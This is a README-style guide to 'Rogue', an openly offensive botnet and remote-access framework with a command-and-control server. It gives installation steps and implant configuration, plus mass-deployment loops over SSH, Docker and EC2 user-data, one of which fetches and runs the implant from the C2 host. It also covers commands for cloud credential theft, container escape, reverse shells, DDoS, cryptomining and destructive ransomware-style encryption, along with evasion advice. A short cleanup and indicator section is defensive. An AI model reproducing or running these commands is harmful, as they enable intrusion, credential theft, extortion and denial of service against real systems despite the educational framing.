# Rogue Botnet: Building and Understanding a Modular RAT w/C2 Framework

**Rogue** is an educational command-and-control (C2) botnet framework built for ethical hackers, red team operators, and defensive researchers. Version 3.2 introduces cloud‑aware implants, provider‑specific payloads (AWS, Azure, GCP, Kubernetes), a full web administration panel, and destructive file encryption modules. This is not a toy; it’s a professional grade testing platform that exposes the inner workings of modern botnets.

The project prioritises clarity over obfuscation. Every encrypted packet, every persistence mechanism, and every cloud detection routine is laid bare so you can learn, adapt, and defend.

```text
░▒▓███████▓▒░ ░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░        
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░        
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓██████▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░        
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░        
░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓██████▓▒░░▒▓████████▓▒░ 
```

---

## >_ Disclaimer – Read Before Touching Code

Rogue is provided **strictly for educational and authorised testing purposes**.  
The file encryption payload (`fileransom.py`) is **destructive** – it permanently removes original files during encryption.  
Cloud exploitation modules (AWS/Azure/GCP credential harvesters, container escapes) must only be used on environments you own or have explicit written permission to test.  

**You assume full liability for misuse.** The author grants no warranty and accepts no responsibility for data loss, legal consequences, or system damage.

---

## >_ What’s New in v3.2 – Cloud Warfare

- **Cloud‑Aware Implant** – automatic detection of AWS, Azure, GCP, Docker, Kubernetes  
- **Cloud‑Specific Tactics** – persistence and evasion adapted to each cloud provider  
- **Cloud Operations Tab** – dedicated web interface for cloud exploitation  
- **5 New Cloud Payloads** – credential stealers for AWS/Azure/GCP, container escape, K8s secret stealer  
- **Advanced Payload Suite** – process injection, advanced file hiding, cron persistence, competitor cleaner  
- **File Encryption Payload** – AES‑256 encryption/decryption (destructive)  
- **Compound Operations** – `trigger_full_recon`, `trigger_harvest_all`, `trigger_clean_sweep`  
- **Ngrok Integration** – automatic tunnel for C2 behind NAT  

---

## >_ Installation – Spinning Up the C2

Tested on Kali Linux / Debian (bare metal or VM). Python 3.8+ required.

```bash
git clone https://github.com/ekomsSavior/rogue.git
cd rogue
sudo apt update
sudo apt install python3 python3-pip python3-dev python3-venv -y

# Core dependencies
pip3 install pycryptodome flask requests psutil setproctitle netifaces paramiko pynput --break-system-packages

# Cloud & advanced features
pip3 install boto3 azure-identity google-cloud-storage kubernetes pyautogui python-nmap secretstorage --break-system-packages
```

If you prefer a venv (cleaner, but who has time):

```bash
python3 -m venv rogue_env
source rogue_env/bin/activate
pip3 install pycryptodome flask requests psutil setproctitle netifaces paramiko pynput boto3 azure-identity google-cloud-storage kubernetes pyautogui python-nmap secretstorage
```

### Ngrok – Punching Through NAT

```bash
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar -xvzf ngrok-v3-stable-linux-amd64.tgz
sudo mv ngrok /usr/local/bin/
ngrok config add-authtoken YOUR_NGROK_AUTH_TOKEN
```

---

## >_ File Structure – Know Your Arsenal

| File / Directory | Purpose |
|----------------|---------|
| `rogue_c2.py` | AES‑encrypted C2 server with web admin panel |
| `rogue_implant.py` | Deployable implant – cloud detection, persistence, fallback |
| `payloads/` | Modular scripts (cloud stealers, DDoS, miner, process injection, file encryption, etc.) |
| `rogue_env/` | Optional virtual environment |

---

## >_ Core Architecture – How the Snake Moves

### AES‑256 Encrypted Channel
All traffic between implants and the C2 is encrypted with a shared 16‑byte key. Hardcoded in both `rogue_c2.py` and `rogue_implant.py` – for real ops, rotate per engagement.

### Cloud Detection & Adaptation (v3.2)
On startup, the implant probes:
- `http://169.254.169.254/latest/meta-data/` → AWS EC2  
- `http://169.254.169.254/metadata/instance?api-version=2021-02-01` → Azure VM  
- `http://metadata.google.internal/computeMetadata/v1/` → GCP  
- `/.dockerenv` or cgroup entries → Docker / Kubernetes  

Based on the detected environment, the implant automatically:
- Chooses hidden directories (`~/.cache/.rogue`, `/var/lib/cloud/.cache`, etc.)
- Adapts persistence (cloud‑init user‑data for AWS, VM extensions for Azure, startup scripts for GCP)
- Pre‑fetches relevant cloud payloads

### Payload Loader
The C2 hosts a simple HTTP server (port 8000). Implants fetch payloads from `PAYLOAD_REPO` and execute them via `run_payload` or `load_payload`.

### Trigger System
Pre‑defined triggers like `trigger_mine`, `trigger_ddos`, `trigger_aws_creds` execute built‑in or downloaded modules. Triggers can be issued to all connected bots or a single bot (`target <index>`).

### Peer‑to‑Peer Fallback
If the primary C2 goes dark, implants broadcast UDP discovery packets to locate other Rogue nodes on the same network, then switch to a secondary C2.

### Persistence – You Can’t Kill What Keeps Coming Back
The implant hides in `~/.cache/.rogue` and adds a stub to `.bashrc`. Cloud‑aware persistence modifies cloud‑init, custom script extensions, or Kubernetes cron jobs.

---

## >_ Running the C2 – Light It Up

```bash
python3 rogue_c2.py
```

Sample output:

```text
============================================================
 ROGUE C2 SERVER - Complete Command & Control
============================================================
[+] Exfil listener started on port 9091
[+] Reverse shell listener started on port 9001
[*] Starting ngrok tunnel...
[+] C2 SERVER IS LIVE!
[NGROK] C2 URL: https://your-subdomain.ngrok-free.dev
[ADMIN] Web Panel: http://localhost:4444/admin
[CLOUD] 5 Cloud Payloads Added
[ADVANCED] 4 Advanced Payloads Added
[FILE ENCRYPTION] System-wide modes: system_test, system_user, system_aggressive, system_destructive
```

Web panel: `http://localhost:4444/admin`  
Ngrok tunnel: `https://*.ngrok-free.dev` – implants use this URL.

---

## >_ Deploying an Implant – Own the Box

1. Copy `rogue_implant.py` to the target.  
2. Edit these variables:

```python
C2_HOST = 'your-subdomain.ngrok-free.dev'
C2_PORT = 4444
PAYLOAD_REPO = "https://your-subdomain.ngrok-free.dev/payloads/"
SECRET_KEY = b'16_byte_shared_key'   # must match rogue_c2.py
```

3. Run:

```bash
python3 rogue_implant.py
```

### Mass Deployment – Spread the Plague

**SSH to Linux hosts:**
```bash
for ip in $(cat targets.txt); do
    scp rogue_implant.py user@$ip:/tmp/
    ssh user@$ip "cd /tmp && python3 rogue_implant.py &"
done
```

**AWS EC2 via user‑data:**
```bash
cat > user-data.sh << 'EOF'
#!/bin/bash
wget https://your-c2.ngrok-free.dev/payloads/rogue_implant.py -O /tmp/rogue.py
python3 /tmp/rogue.py &
EOF
aws ec2 run-instances --image-id ami-12345678 --user-data file://user-data.sh
```

**Docker container – break the sandbox:**
```bash
docker cp rogue_implant.py container_name:/tmp/
docker exec container_name python3 /tmp/rogue_implant.py &
```

---

## >_ Hosting Payloads – Feed the Horde

The C2 automatically serves payloads from `payloads/` via ngrok. Manual server:

```bash
cd payloads
python3 -m http.server 8000
```

Ensure `PAYLOAD_REPO` in `rogue_implant.py` points to the correct URL.

---

## >_ Command Syntax – C2 Console

Once bots connect, use `target <index>` to select a specific bot, or issue commands to all.

| Command | Description |
|---------|-------------|
| `list` | Show connected bots (cloud environment badge) |
| `target 2` | Switch to bot #2 |
| `load_payload mine.py` | Download `mine.py` from HTTP server |
| `run_payload mine.py` | Execute the module |
| `reverse_shell` | Open reverse shell on port 9001 (run `nc -lvnp 9001` first) |
| `trigger_mine` | Execute mining payload on all bots |
| `trigger_ddos <target> <port> <duration> <threads> <mode>` | Launch DDoS |
| `trigger_aws_creds` | Harvest AWS credentials |
| `trigger_container_escape` | Break out of Docker |
| `trigger_fileransom encrypt /path [password]` | **DESTRUCTIVE** – encrypt files |
| `help` | Show all commands |

---

## >_ Payload Reference – The Sharp End

### Core Payloads (pre‑v3.2)

**`mine.py`** – Monero CPU miner (SHA256)  
Edit `WALLET` and `POOL`. Real pool required for yield.

**`ddos.py`** – Multi‑mode DDoS engine  
Modes: `http`, `udp`, `tcp`. Optional Tor routing (`USE_TOR = True`).

**`sysrecon.py`** – System recon (hardware, network, users, processes, defences)  
Trigger: `trigger_sysrecon`

**`linpeas_light.py`** – Linux privilege escalation checker  
Trigger: `trigger_linpeas`

**`hashdump.py`** – Extract password hashes (`/etc/shadow`, SSH keys, browser creds)  
Trigger: `trigger_hashdump`

---

### Advanced Payloads (v3.1+)

| Payload | Trigger | Description |
|---------|---------|-------------|
| `process_inject.py` | `trigger_procinject` | Inject into systemd, sshd, nginx, apache – memory‑only |
| `advanced_filehider.py` | `trigger_filehide` | Hide files using extended attributes, dot prefixes, filesystem tunneling |
| `advanced_cron_persistence.py` | `trigger_cronpersist` | Obfuscated cron with randomised schedules, self‑healing |
| `competitor_cleaner.py` | `trigger_compclean` | Detect and remove other malware families / backdoors |

---

### Cloud Payloads (v3.2 – new)

| Payload | Trigger | Target |
|---------|---------|--------|
| `cloud_detector.py` | `trigger_cloud_detect` | AWS/Azure/GCP/Docker/K8s fingerprinting |
| `aws_credential_stealer.py` | `trigger_aws_creds` | IAM roles, metadata, `~/.aws/`, env vars |
| `azure_cred_harvester.py` | `trigger_azure_creds` | Managed identity tokens, Azure CLI, service principals |
| `gcp_cred_stealer.py` | `trigger_gcp_creds` | GCP metadata, `~/.config/gcloud`, access tokens |
| `container_escape.py` | `trigger_container_escape` | Docker socket, privilege escalation, mount namespace breakout |
| `k8s_secret_stealer.py` | `trigger_k8s_creds` | Kubernetes secrets, service account tokens, configmaps |

**Cloud detection output example:**
```text
[CLOUD] Provider: AWS (confidence: high)
[CLOUD] Metadata: i-0a1b2c3d4e5f67890, us-east-1
[CLOUD] Adapted persistence: cloud-init user-data
```

---

### Destructive Payload – File Encryption

**`fileransom.py`** – AES‑256 encryption/decryption.  
**WARNING:** Original files are permanently removed. Recovery requires the exact password.

```bash
trigger_fileransom encrypt /home/user/Documents mySecretPassword
trigger_fileransom decrypt /home/user/Documents mySecretPassword
```

If no password, a random 32‑char string is generated and saved to `encryption_log.txt` on target.

---

## >_ Web Interface – Command from the Throne

Access: `http://localhost:4444/admin`

| Tab | Function |
|-----|----------|
| **Active Bots** | List implants with cloud environment badge. Send commands, view queues. |
| **Operations** | Pre‑built triggers (recon, cred access, persistence, cloud ops, compound ops). |
| **Payloads** | Browse and load all payloads – cloud, advanced, core. Colour‑coded badges. |
| **Advanced** | Process injection, advanced file hider, cron persistence, competitor cleaner. |
| **Cloud Ops** | Dedicated panel: cloud detection, AWS/Azure/GCP harvesting, container escape, K8s secret stealer, full cloud scanner. |
| **Results** | Command output history, filterable by bot ID. |
| **Server Status** | Uptime, ngrok URL, active bot count, payload counts. |

### Cloud Ops – Quick Commands

```bash
trigger_cloud_detect          # Identify environment
trigger_cloud_recon           # Provider‑specific intel
trigger_aws_creds             # Steal AWS keys
trigger_azure_creds           # Steal Azure tokens
trigger_container_escape      # Break out of Docker
trigger_k8s_creds             # Harvest Kubernetes secrets
trigger_cloud_scan full       # Metadata + credentials + resources
```

---

## >_ Extending Rogue – Red Team Hardening

The base framework is raw. For real operations, add these layers:

### Obfuscate C2 Infrastructure

- **Redirectors** – Proxy through VPS instances to hide real C2 IP.  
- **Domain Fronting** – Abuse CDNs (CloudFront, Fastly) to disguise C2 traffic.   
- **Tor Hidden Service** – Host C2 as an `.onion` address.

### Alternative Communication Channels

- **Email (SMTP/IMAP)** – Use a compromised mailbox as dead‑drop.  
- **Social Media** – Monitor Twitter / Reddit posts for encoded commands.

---

## >_ Emergency Removal & Forensics – Burn It All

If you need to clean a compromised test system:

### General Linux
```bash
sudo pkill -9 -f rogue
rm -rf ~/.cache/.rogue
sudo sed -i '/rogue/d' ~/.bashrc /etc/cron.d/*
```

### AWS EC2
```bash
sudo pkill -9 -f rogue
sudo rm -rf /var/lib/cloud/.cache/rogue*
sudo sed -i '/ROGUE/d' /etc/cloud/cloud.cfg
```

### Docker / Kubernetes
```bash
# Inside container
pkill -9 -f rogue
rm -rf /.cache/.rogue

# If escape succeeded, check host for rogue processes
ps aux | grep -E "docker|containerd" | grep -v grep
```

### IoC Detection – Cloud Environments
- **AWS**: unexpected IMDSv2 queries, new IAM role usage, CloudTrail `GetCallerIdentity` spikes.  
- **Azure**: managed identity token requests from unusual source IPs, custom script extension installations.  
- **GCP**: metadata API calls, service account key creation.  
- **Containers**: `docker.sock` mounts, `--privileged` flag, hostPID sharing.

---

## >_ Final Thoughts – Know Your Enemy

Rogue is a complete educational C2 framework that mirrors real‑world cloud‑aware malware. By studying its source – from AES encryption and payload loading to cloud metadata harvesting and container escape – you gain the insight needed to defend modern infrastructures.

Do not just run it. Break it. Rebuild it. Add your own payloads. Write detection rules. Then use that knowledge to harden your own systems.

**Clone the repository:**  
[https://ek0mssavi0r.dev/tools/rogue](https://ek0mssavi0r.dev/tools/rogue)  
[https://github.com/ekomsSavior/rogue](https://github.com/ekomsSavior/rogue)  
[https://churchofmalware.org](https://churchofmalware.org)

**Follow the author for more offensive security research:**  
[https://instagram.com/ekoms.is.my.savior](https://instagram.com/ekoms.is.my.savior)

**Remember:** With great power comes great responsibility. Use this tool only in isolated labs or with written authorisation. The author assumes no liability for misuse, data loss, or legal consequences.

*For authorised security testing only.*